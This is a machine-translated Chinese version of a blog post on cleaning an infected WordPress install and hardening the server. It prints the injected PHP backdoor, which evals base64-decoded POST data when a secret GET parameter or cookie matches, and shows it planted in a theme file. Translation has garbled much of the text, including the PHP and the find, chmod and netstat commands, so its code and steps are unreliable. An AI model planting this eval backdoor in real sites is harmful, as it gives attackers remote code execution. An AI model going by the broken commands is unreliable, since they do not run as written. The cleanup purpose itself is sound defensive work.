WordPress的漏洞 - 清洁​​文件的病毒和安全的SQL服务器。

在你读这篇文章之前,你应该看到 ,要了解的东西。 :)

我们发现有很多的博客对stealthsettings.com文件,类似于下面的代码,而从virusarii WordPress的开发.:

<?腓如果($ _ GET [ '573abcb060974771'] == “8e96d1b4b674e1d2”){的eval(base64_decode($ _ POST [ '文件'])); 退出; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

XMLRPC如果上面的有关该文件的 xmlrpc.php 德拉 ,在A grep的 服务器,貌似这种相当多的源代码。

pppffiuuu

清洗受感染的文件:

Ooookkkk ...
1。 最好的解决办法,因为它是做 备份和清理数据库是 消除WordPress (你可以保持文件的wp-config.php和不严格相关的WP平台,仔细检查后,在服务器上),使原载版本 2.5.1 (在此之际,进行版本升级WP :)) http://wordpress.org/download/ 。 擦拭包括主题文件,如果你不相信,他们仔细检查。

它似乎已经受到影响,尚未使用之前在博客上,只是改变主题的主题文件,没有解决不了的问题。

./andreea/wp-content/themes/default/index.php:<?php如果($ _ COOKIE ['44e827f9fbeca184'] =='5cd3c94b4b1c57ea“){的eval(base64_decode($ _ POST ['文件'])); 出口; ?}?> <PHP的get_header(); ?>

2。 搜索并删除所有的文件,其中包含:* _new.php,* _old.php,*。Jpgg,*。吉夫,*。的Pngg和WP-info.txt文件,如果有的话。

查找。 名称“* _new.php”
查找。 名称“* _old.php”
查找。 名称“*。Jpgg”
查找。 名称“* _giff”
查找。 名称“* _pngg”
查找。 名称“WP-info.txt文件”

3。 在 / tmp目录 ,搜索和删除文件夹,如 tmpYwbzT2

SQL清洗 :

1。 在数据表 wp_options 检查和删除线: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2。 所有wp_options active_plugins 并删除,如果有一个插件,在一个扩展名为* _new.php,* _old.php,*。jpgg,*。吉夫,*。pngg或怀疑另一分机,仔细检查结束。

3。 在表 wp_users,如果有一个用户谁没有写过东西,列在他的右 user_nicename。 删除用户,但要注意的ID列上的号码。 用户可以使用“WordPress的” 用user_login 创建和出现在00:00:00 0000 00 00。

4。 转到表 wp_usermeta 并删除所有线以上属于ID。

当你做了这个SQL清洗,禁用然后启用某个插件。 (博客 - >“面板 - >插件)

安全服务器:

1。 查看目录和文件“可写“(CHMOD 777),并试图把他们 CHMOD 在任何级别的,不会让自己的写作。 (CHMOD 644,例如)

查找。 彼尔姆2 LS

2。 查看哪些文件有位集 SUIDSGID 。 如果你不使用这些文件对他们提出 CHMOD 0的 或卸载程序包,它包含。 他们是非常危险的,因为他们执行权限““或”“不具有普通用户权限执行该文件。

/型F-烫发04000 LS
/型F-烫发02000 LS

3。 查看哪些端口是开放的,并尝试关闭或担保这些一点用都没有。

NETSTAT-| grep的,我听

这么多。 我看到 谷歌搜索和其他人说,“嗯,他们做到了!”。 好吧好吧,你已经做了......但你知道,如果谷歌开始禁止 所有站点 成型 为垃圾邮件 并把木马(Trojan.Clicker.HTML)饼干?

WordPress的漏洞 - 清洁​​文件的病毒和安全的SQL服务器。

关于作者

隐形

热爱这些小工具,并将其写入2006的欣然stealthsettings.com,我喜欢去发现与你有关计算机和MacOS,Linux和Windows中,iOS和Android的新的东西的一切。

1评论

发表评论